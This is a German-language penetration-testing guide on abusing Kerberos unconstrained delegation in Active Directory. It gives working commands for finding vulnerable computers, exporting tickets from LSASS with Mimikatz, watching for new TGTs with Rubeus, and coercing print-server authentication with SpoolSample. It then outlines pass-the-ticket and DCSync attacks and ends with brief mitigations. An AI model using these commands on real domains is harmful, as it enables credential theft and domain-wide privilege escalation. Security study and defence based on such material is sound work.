Unbeschränkte Delegation

Dies ist eine Funktion, die ein Domänenadministrator für jeden Computer in der Domäne festlegen kann. Jedes Mal, wenn sich ein Benutzer anmeldet und auf den Computer zugreift, wird eine Kopie des TGTs dieses Benutzers an den TGS gesendet, der vom DC bereitgestellt wird, und im LSASS im Speicher gespeichert. Wenn Sie Administratorrechte auf dem Computer haben, können Sie die Tickets abrufen und die Benutzer auf jedem Computer imitieren.

Wenn sich also ein Domänenadministrator auf einem Computer mit aktivierter "Unbeschränkter Delegation" anmeldet und Sie lokale Administratorrechte auf diesem Computer haben, können Sie das Ticket abrufen und den Domänenadministrator überall imitieren (Domänenprivilegierung).

Sie können Computerobjekte mit diesem Attribut finden, indem Sie überprüfen, ob das userAccountControl-Attribut ADS_UF_TRUSTED_FOR_DELEGATION enthält. Dies können Sie mit einem LDAP-Filter von '(userAccountControl:1.2.840.113556.1.4.803:=524288)' tun, was Powerview tut:

# Liste der Computer ohne Einschränkungen
## Powerview
Get-NetComputer -Unconstrained #DCs erscheinen immer, sind aber für Privilegierung nicht nützlich
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Tickets mit Mimikatz exportieren
privilege::debug
sekurlsa::tickets /export #Empfohlene Methode
kerberos::list /export #Eine andere Methode

# Anmeldungen überwachen und neue Tickets exportieren
.\Rubeus.exe monitor /targetuser:<Benutzername> /interval:10 #Alle 10 Sekunden nach neuen TGTs suchen

Laden Sie das Ticket des Administrators (oder des Opferbenutzers) mit Mimikatz oder Rubeus für ein Pass the Ticket** in den Speicher**. Weitere Informationen: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ Weitere Informationen zur unbeschränkten Delegation auf ired.team.

Erzwinge Authentifizierung

Wenn ein Angreifer in der Lage ist, einen für "Unbeschränkte Delegation" zugelassenen Computer zu kompromittieren, könnte er einen Druckserver dazu bringen, sich automatisch gegen ihn anzumelden und ein TGT im Speicher des Servers zu speichern. Dann könnte der Angreifer einen Pass-the-Ticket-Angriff durchführen, um das Benutzerkonto des Druckservers zu imitieren.

Um einen Druckserver zur Anmeldung an einem beliebigen Computer zu bringen, können Sie SpoolSample verwenden:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

Wenn das TGT von einem Domänencontroller stammt, könnten Sie einen DCSync-Angriff durchführen und alle Hashes vom DC erhalten. Weitere Informationen zu diesem Angriff auf ired.team.

Hier sind weitere Möglichkeiten, um eine Authentifizierung zu erzwingen:

Abhilfe

• Begrenzen Sie DA/Admin-Anmeldungen auf bestimmte Dienste.

• Setzen Sie "Konto ist sensibel und kann nicht weitergeleitet werden" für privilegierte Konten.